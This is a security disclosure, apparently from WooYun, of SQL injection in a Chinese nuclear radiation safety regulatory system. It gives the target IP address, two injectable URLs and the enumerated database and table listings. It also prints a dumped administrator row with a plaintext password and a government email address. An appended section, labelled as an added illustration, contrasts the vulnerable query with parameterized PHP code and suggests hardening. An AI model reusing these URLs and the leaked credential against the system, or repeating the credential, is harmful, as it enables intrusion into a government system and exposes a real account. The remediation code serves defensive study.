
SQL injection in the National Nuclear Technology Utilization Radiation Safety Regulatory System

2014-11-03 13:20

Injection URLs:

https://1.202.234.22/admin/singlelogin.php?submit=1&loginId=1

https://1.202.234.22/admin/list_ipAddressPolicy.php?GroupId=1

[Screenshot: 1.JPG]

[Screenshot: 2.JPG]

available databases [6]:
[*] information_schema
[*] iscserver
[*] iscserver_bak
[*] mysql
[*] performance_schema
[*] test



Database: iscserver
[138 tables]
+-------------------------+
| Admin                   |
| ApplyUser               |
| AutoRouteOutInfo        |
| BandIPMac               |
| CRLPublish              |
| CertCRL                 |
| CertReq                 |
| ClientAppLog            |
| Configure               |
| CurrentFlowStat         |
| CurrentFlowStatBak      |
| DEVICE_CONFIG           |
| Domain                  |
| DomainAdmin             |
| EMailConfig             |
| ExpiredISCUserTable     |
| FireWall                |
| GWCurrentFlowStat       |
| GWCurrentFlowStatBak    |
| GWHistoryFlowStat       |
| GWLink                  |
| GWLinkExtInfo           |
| GroupNoCachePolicy      |
| HWFeature               |
| HWFeatureReq            |
| HistoryFlowStat         |
| HostCount               |
| ISCGWTable              |
| ISCGroupAnticrack       |
| ISCGroupTable           |
| ISCGroupTimePolicy      |
| ISCGroupUserLoginPolicy |
| ISCIPPool               |
| ISCMemberTable          |
| ISCOnLineUser           |
| ISCRoute                |
| ISCSPPolicy             |
| ISCSSRoute              |
| ISCUpdate               |
| ISCUserActivity         |
| ISCUserActivityLog      |
| ISCUserTable            |
| ISCWebPluginPolicy      |
| ISCWebPluginRule        |
| ISCWorkloadTable        |
| ISC_Account_Template    |
| ISC_Algorithm_Para      |
| ISC_Auth_Algorithm      |
| ISC_Auth_Method         |
| ISC_Method_Para         |
| IpAddressPolicy         |
| Ipsec_Tunnel            |
| LogTable                |
| LogType                 |
| MT_IpPool               |
| MailAdminTable          |
| Menu_Style              |
| MobileInfoTable         |
| NAT                     |
| NATConfig               |
| NatMap                  |
| Policy                  |
| PortMap                 |
| PortalMap               |
| ProgramConf             |
| ProxyBackDomainTable    |
| ProxyConfigTable        |
| ProxyMapTable           |
| ProxyPolicyTable        |
| Radius                  |
| ReplacePatternTable     |
| ResourceCategoryTable   |
| ResourceIconTable       |
| Rule                    |
| RuleViolateLog          |
| SToSRule                |
| SingleLoginUser         |
| SinglePointLogin        |
| Sproxy_App              |
| Sproxy_Policy           |
| SystemAlarmLogTable     |
| SystemAlarmTable        |
| Tunnel                  |
| TunnelRoute             |
| TunnelRouteMasq         |
| UrlCount                |
| UrlLogRules             |
| UrlLogTable             |
| UserLoginAnticrack      |
| UserNameCount           |
| VirtualSiteTable        |
| WebAppAccount           |
| WebAppDesktop           |
| WebAppGroup             |
| WebPolicyTable          |
| WebServer               |
| cp_AntiSpyware          |
| cp_AntiVirus            |
| cp_FireWall             |
| cp_NACPolicy            |
| cp_OS                   |
| cp_OSFWpolicy           |
| cp_OSpath               |
| cp_Program              |
| fw_AddressInterpret     |
| fw_AddressMasquerading  |
| fw_BandIPMac            |
| fw_BuildIP              |
| fw_DAddressMasquerading |
| fw_FireWall             |
| fw_NatMap               |
| fw_PortMap              |
| fw_Resource             |
| fw_SAddressMasquerading |
| g_WebServer             |
| hot_device              |
| u_Admin                 |
| u_Apply                 |
| u_ApplyCardType         |
| u_ApplyConfig           |
| u_ApplyDept             |
| u_ApplyLei              |
| u_ApplyOffice           |
| u_ApplyRole             |
| u_ApplyUsePurpose       |
| u_Autoshenhe            |
| u_Dzzy                  |
| u_LogTable              |
| u_Mail                  |
| u_Nat                   |
| u_Tu_jdt                |
| u_Tu_zxt                |
| u_Web_gonggao           |
| u_Web_iptong            |
| u_Web_wenti             |
| u_Web_wentihf           |
| u_Webconf               |
| u_shenhePolicy          |
+-------------------------+



Database: iscserver
Table: Admin
[1 entry]
+---------+--------+--------+------------+--------------------+-----------+
| AdminId | State  | Passwd | AdminName  | EmailAddr          | Privilege |
+---------+--------+--------+------------+--------------------+-----------+
| 1       | active | dep501 | SuperAdmin | rsms@rr.mep.gov.cn | abcde     |
+---------+--------+--------+------------+--------------------+-----------+



Proof of vulnerability:

[Screenshot: 1.JPG]

[Screenshot: 2.JPG]

Remediation:

They know.
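The report shows two injectable integer parameters (loginId on singlelogin.php, GroupId on list_ipAddressPolicy.php) but not the application code behind them or a concrete fix. The following is an added illustration, not code from the report or from the affected system: the query pattern that typically produces this kind of finding, next to the parameterized form that closes it. Only the endpoint names, parameter names and the table and database names (IpAddressPolicy, SingleLoginUser, iscserver, iscserver_bak) come from the report; the PDO connection, the column names GroupId and LoginId, the account name web_ro and every function name are assumptions.

```php
<?php
// Added example, not code from the report or from the affected application
// (its source is not shown). Assumptions: a PDO connection to the iscserver
// MySQL database, a table IpAddressPolicy with an integer GroupId column and a
// table SingleLoginUser with an integer LoginId column (the table names appear
// in the report's dump; the column names and function names are assumptions).

declare(strict_types=1);

// Vulnerable pattern behind a URL like list_ipAddressPolicy.php?GroupId=1:
// the raw query-string value is spliced into the SQL text, so whatever the
// client sends (sqlmap's probes included) is executed as part of the statement.
function listIpPoliciesUnsafe(PDO $pdo, string $groupId): array
{
    $sql = "SELECT * FROM IpAddressPolicy WHERE GroupId = " . $groupId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: reject anything that is not an integer before the database
// is touched, then pass the value as a bound parameter so it can never become
// SQL syntax.
function listIpPolicies(PDO $pdo, string $groupId): array
{
    $id = filter_var($groupId, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('GroupId must be an integer');
    }
    $stmt = $pdo->prepare('SELECT * FROM IpAddressPolicy WHERE GroupId = :gid');
    $stmt->bindValue(':gid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The same treatment for singlelogin.php?loginId=1.
function findSingleLoginUser(PDO $pdo, string $loginId): ?array
{
    $id = filter_var($loginId, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('loginId must be an integer');
    }
    $stmt = $pdo->prepare('SELECT * FROM SingleLoginUser WHERE LoginId = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection settings that matter for the fix: server-side prepares (no
// client-side emulation), exceptions instead of silent failures, and a
// dedicated low-privilege account. Grant that account SELECT only on the
// tables the web front end needs; it should not be able to enumerate mysql.*
// or iscserver_bak the way the report's database listing shows the injected
// query could.
function connect(): PDO
{
    $dsn = 'mysql:host=127.0.0.1;dbname=iscserver;charset=utf8mb4';
    return new PDO($dsn, 'web_ro', getenv('DB_PASSWORD') ?: '', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Request handler: only the validated integer ever reaches the query layer.
function handleListRequest(array $query): array
{
    $pdo = connect();
    return listIpPolicies($pdo, (string) ($query['GroupId'] ?? ''));
}

// Usage inside the page script:
// echo json_encode(handleListRequest($_GET));
```

Two points a practitioner would add to the code fix. First, the Admin row in the dump shows the Passwd column holding a short recoverable value rather than a hash, so after the injection is closed the administrator credential should be rotated and stored with password_hash() / password_verify(). Second, the database listing shows the web account could read every database on the server, including mysql; restricting that account is what limits the damage the next injection bug can do.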


Source: www.wooyun.org/bugs/wooyun-2014-076588
